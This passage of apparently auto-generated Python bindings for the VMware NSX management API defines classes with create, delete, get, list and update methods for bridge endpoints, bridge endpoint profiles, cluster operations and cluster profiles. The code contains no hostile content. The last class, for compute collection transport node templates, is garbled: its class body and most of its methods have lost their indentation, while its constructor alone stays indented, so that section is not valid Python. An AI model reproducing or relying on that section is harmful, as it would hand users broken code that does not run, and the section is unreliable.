        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
        :return: com.vmware.nsx.model.BridgeEndpointProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'bridgeendpointprofile_id': bridgeendpointprofile_id,
                            })
    def list(self,
             cursor=None,
             edge_cluster_id=None,
             failover_mode=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns information about all configured bridge endpoint profiles

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type edge_cluster_id: :class:`str` or ``None``
        :param edge_cluster_id: Edge Cluster Identifier (optional)
        :type failover_mode: :class:`str` or ``None``
        :param failover_mode: (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfileListResult`
        :return: com.vmware.nsx.model.BridgeEndpointProfileListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'edge_cluster_id': edge_cluster_id,
                            'failover_mode': failover_mode,
                            'included_fields': included_fields,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })
    def update(self,
               bridgeendpointprofile_id,
               bridge_endpoint_profile,
               ):
        """
        Modifies an existing bridge endpoint profile.

        :type bridgeendpointprofile_id: :class:`str`
        :param bridgeendpointprofile_id: (required)
        :type bridge_endpoint_profile: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
        :param bridge_endpoint_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
        :return: com.vmware.nsx.model.BridgeEndpointProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'bridgeendpointprofile_id': bridgeendpointprofile_id,
                            'bridge_endpoint_profile': bridge_endpoint_profile,
                            })
class BridgeEndpoints(VapiInterface):
    """
    Generated API bindings for the ``com.vmware.nsx.bridge_endpoints``
    service. Provides CRUD operations on bridge endpoints; every method
    builds a parameter dictionary and forwards the call to the server via
    ``self._invoke``.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_endpoints'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _BridgeEndpointsStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               bridge_endpoint,
               ):
        """
        Creates a Bridge Endpoint. It describes the physical attributes of the
        bridge like vlan. A logical port can be attached to a vif providing
        bridging functionality from the logical overlay network to the
        physical vlan network

        :type bridge_endpoint: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
        :param bridge_endpoint: (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
        :return: com.vmware.nsx.model.BridgeEndpoint
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'bridge_endpoint': bridge_endpoint,
                            })
    def delete(self,
               bridgeendpoint_id,
               ):
        """
        Deletes the specified Bridge Endpoint.

        :type bridgeendpoint_id: :class:`str`
        :param bridgeendpoint_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'bridgeendpoint_id': bridgeendpoint_id,
                            })
    def get(self,
            bridgeendpoint_id,
            ):
        """
        Returns information about a specified bridge endpoint.

        :type bridgeendpoint_id: :class:`str`
        :param bridgeendpoint_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
        :return: com.vmware.nsx.model.BridgeEndpoint
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'bridgeendpoint_id': bridgeendpoint_id,
                            })
    def list(self,
             bridge_cluster_id=None,
             bridge_endpoint_profile_id=None,
             cursor=None,
             included_fields=None,
             logical_switch_id=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             vlan_transport_zone_id=None,
             ):
        """
        Returns information about all configured bridge endpoints

        :type bridge_cluster_id: :class:`str` or ``None``
        :param bridge_cluster_id: Bridge Cluster Identifier (optional)
        :type bridge_endpoint_profile_id: :class:`str` or ``None``
        :param bridge_endpoint_profile_id: Bridge endpoint profile used by the edge cluster (optional)
        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type logical_switch_id: :class:`str` or ``None``
        :param logical_switch_id: Logical Switch Identifier (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type vlan_transport_zone_id: :class:`str` or ``None``
        :param vlan_transport_zone_id: VLAN transport zone id used by the edge cluster (optional)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointListResult`
        :return: com.vmware.nsx.model.BridgeEndpointListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'bridge_cluster_id': bridge_cluster_id,
                            'bridge_endpoint_profile_id': bridge_endpoint_profile_id,
                            'cursor': cursor,
                            'included_fields': included_fields,
                            'logical_switch_id': logical_switch_id,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            'vlan_transport_zone_id': vlan_transport_zone_id,
                            })
    def update(self,
               bridgeendpoint_id,
               bridge_endpoint,
               ):
        """
        Modifies an existing bridge endpoint.

        :type bridgeendpoint_id: :class:`str`
        :param bridgeendpoint_id: (required)
        :type bridge_endpoint: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
        :param bridge_endpoint: (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
        :return: com.vmware.nsx.model.BridgeEndpoint
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'bridgeendpoint_id': bridgeendpoint_id,
                            'bridge_endpoint': bridge_endpoint,
                            })
class Cluster(VapiInterface):
    """
    Generated API bindings for the ``com.vmware.nsx.cluster`` service.
    Provides cluster-wide operations: one-time backup and inventory-summary
    upload, node join/remove, reading cluster and node configuration, and
    proxying GET/POST/PUT/DELETE requests to individual cluster nodes.
    Every method builds a parameter dictionary and forwards the call to the
    server via ``self._invoke``.
    """
    REMOVENODE_FORCE_TRUE = "true"
    """
    Possible value for ``force`` of method :func:`Cluster.removenode`.
    """
    REMOVENODE_FORCE_FALSE = "false"
    """
    Possible value for ``force`` of method :func:`Cluster.removenode`.
    """
    REMOVENODE_GRACEFUL_SHUTDOWN_TRUE = "true"
    """
    Possible value for ``gracefulShutdown`` of method :func:`Cluster.removenode`.
    """
    REMOVENODE_GRACEFUL_SHUTDOWN_FALSE = "false"
    """
    Possible value for ``gracefulShutdown`` of method :func:`Cluster.removenode`.
    """
    REMOVENODE_IGNORE_REPOSITORY_IP_CHECK_TRUE = "true"
    """
    Possible value for ``ignoreRepositoryIpCheck`` of method
    :func:`Cluster.removenode`.
    """
    REMOVENODE_IGNORE_REPOSITORY_IP_CHECK_FALSE = "false"
    """
    Possible value for ``ignoreRepositoryIpCheck`` of method
    :func:`Cluster.removenode`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.cluster'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ClusterStub)
        self._VAPI_OPERATION_IDS = {}
    def backuptoremote(self):
        """
        Request one-time backup. The backup will be uploaded using the same
        server configuration as for automatic backup.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('backuptoremote', None)
    def create(self,
               target_node_id,
               target_uri,
               ):
        """
        Invoke POST request on target cluster node

        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID or keyword self (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def delete(self,
               target_node_id,
               target_uri,
               ):
        """
        Invoke DELETE request on target cluster node

        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID or keyword self (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def get(self):
        """
        Returns information about the NSX cluster configuration. An NSX cluster
        has two functions or purposes, commonly referred to as \"roles.\" These
        two roles are control and management. Each NSX installation has a
        single cluster. Separate NSX clusters do not share data. In other
        words, a given data-plane node is attached to only one cluster, not to
        multiple clusters.

        :rtype: :class:`com.vmware.nsx.model_client.ClusterConfig`
        :return: com.vmware.nsx.model.ClusterConfig
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get', None)
    def get_0(self,
              node_id,
              ):
        """
        Returns information about the specified NSX cluster node.

        :type node_id: :class:`str`
        :param node_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ClusterNodeInfo`
        :return: com.vmware.nsx.model.ClusterNodeInfo
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get_0',
                            {
                            'node_id': node_id,
                            })
    def get_1(self,
              target_node_id,
              target_uri,
              ):
        """
        Invoke GET request on target cluster node

        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID or keyword self (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get_1',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def joincluster(self,
                    join_cluster_parameters,
                    ):
        """
        Join this node to a NSX Cluster

        :type join_cluster_parameters: :class:`com.vmware.nsx.model_client.JoinClusterParameters`
        :param join_cluster_parameters: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ClusterConfiguration`
        :return: com.vmware.nsx.model.ClusterConfiguration
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('joincluster',
                            {
                            'join_cluster_parameters': join_cluster_parameters,
                            })
    def removenode(self,
                   node_id,
                   force=None,
                   graceful_shutdown=None,
                   ignore_repository_ip_check=None,
                   ):
        """
        Detach a node from the Cluster

        :type node_id: :class:`str`
        :param node_id: UUID of the node (required)
        :type force: :class:`str` or ``None``
        :param force: (optional)
        :type graceful_shutdown: :class:`str` or ``None``
        :param graceful_shutdown: (optional, default to false)
        :type ignore_repository_ip_check: :class:`str` or ``None``
        :param ignore_repository_ip_check: (optional, default to false)
        :rtype: :class:`com.vmware.nsx.model_client.ClusterConfiguration`
        :return: com.vmware.nsx.model.ClusterConfiguration
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('removenode',
                            {
                            'node_id': node_id,
                            'force': force,
                            'graceful_shutdown': graceful_shutdown,
                            'ignore_repository_ip_check': ignore_repository_ip_check,
                            })
    def summarizeinventorytoremote(self):
        """
        Request one-time inventory summary. The summary will be uploaded using
        the same server configuration as for an automatic backup.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('summarizeinventorytoremote', None)
    def update(self,
               target_node_id,
               target_uri,
               ):
        """
        Invoke PUT request on target cluster node

        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID or keyword self (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
class ClusterProfiles(VapiInterface):
    """
    Generated API bindings for the ``com.vmware.nsx.cluster_profiles``
    service. Provides CRUD operations on cluster profiles; create/update
    accept and get returns polymorphic :class:`vmware.vapi.struct.VapiStruct`
    payloads because the concrete profile type depends on ``resource_type``.
    Every method builds a parameter dictionary and forwards the call to the
    server via ``self._invoke``.
    """
    LIST_RESOURCE_TYPE_EDGEHIGHAVAILABILITYPROFILE = "EdgeHighAvailabilityProfile"
    """
    Possible value for ``resourceType`` of method :func:`ClusterProfiles.list`.
    """
    LIST_RESOURCE_TYPE_BRIDGEHIGHAVAILABILITYCLUSTERPROFILE = "BridgeHighAvailabilityClusterProfile"
    """
    Possible value for ``resourceType`` of method :func:`ClusterProfiles.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.cluster_profiles'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ClusterProfilesStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               cluster_profile,
               ):
        """
        Create a cluster profile. The resource_type is required.

        :type cluster_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param cluster_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.ClusterProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.ClusterProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.ClusterProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'cluster_profile': cluster_profile,
                            })
    def delete(self,
               cluster_profile_id,
               ):
        """
        Delete a specified cluster profile.

        :type cluster_profile_id: :class:`str`
        :param cluster_profile_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'cluster_profile_id': cluster_profile_id,
                            })
    def get(self,
            cluster_profile_id,
            ):
        """
        Returns information about a specified cluster profile.

        :type cluster_profile_id: :class:`str`
        :param cluster_profile_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.ClusterProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.ClusterProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'cluster_profile_id': cluster_profile_id,
                            })
    def list(self,
             cursor=None,
             include_system_owned=None,
             included_fields=None,
             page_size=None,
             resource_type=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns paginated list of cluster profiles Cluster profiles define
        policies for edge cluster and bridge cluster.

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type include_system_owned: :class:`bool` or ``None``
        :param include_system_owned: Whether the list result contains system resources (optional,
            default to true)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type resource_type: :class:`str` or ``None``
        :param resource_type: Supported cluster profiles. (optional)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ClusterProfileListResult`
        :return: com.vmware.nsx.model.ClusterProfileListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'include_system_owned': include_system_owned,
                            'included_fields': included_fields,
                            'page_size': page_size,
                            'resource_type': resource_type,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })
    def update(self,
               cluster_profile_id,
               cluster_profile,
               ):
        """
        Modifies a specified cluster profile. The body of the PUT request must
        include the resource_type.

        :type cluster_profile_id: :class:`str`
        :param cluster_profile_id: (required)
        :type cluster_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param cluster_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.ClusterProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.ClusterProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.ClusterProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'cluster_profile_id': cluster_profile_id,
                            'cluster_profile': cluster_profile,
                            })
class ComputeCollectionTransportNodeTemplates(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.compute_collection_transport_node_templates'
"""
Identifier of the service in canonical form.
"""
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        # Bind this interface to its generated stub class; this service
        # declares no polymorphic operation ids.
        VapiInterface.__init__(self, config, _ComputeCollectionTransportNodeTemplatesStub)
        self._VAPI_OPERATION_IDS = {}
def create(self,
compute_collection_transport_node_template,
):
"""
If automated transport node creation is configured on compute
collection, this template will serve as the default setting for
transport node creation. Note- transport node templates APIs are
deprecated and user is recommended to use transport node profiles APIs
instead.
:type compute_collection_transport_node_template: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:param compute_collection_transport_node_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'compute_collection_transport_node_template': compute_collection_transport_node_template,
})
def delete(self,
template_id,
):
"""
Delete the specified compute collection transport node template. Note-
transport node templates APIs are deprecated and user is recommended to
use transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'template_id': template_id,
})
def get(self,
template_id,
):
"""
Returns compute collection transportnode template by id Note- transport
node templates APIs are deprecated and user is recommended to use
transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'template_id': template_id,
})
def list(self,
compute_collection_id=None,
):
"""
Returns all eligible compute collection transportnode templates Note-
transport node templates APIs are deprecated and user is recommended to
use transport node profiles APIs instead.
:type compute_collection_id: :class:`str` or ``None``
:param compute_collection_id: Compute collection id (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeTemplateListResult`
:return: com.vmware.nsx.model.TransportNodeTemplateListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
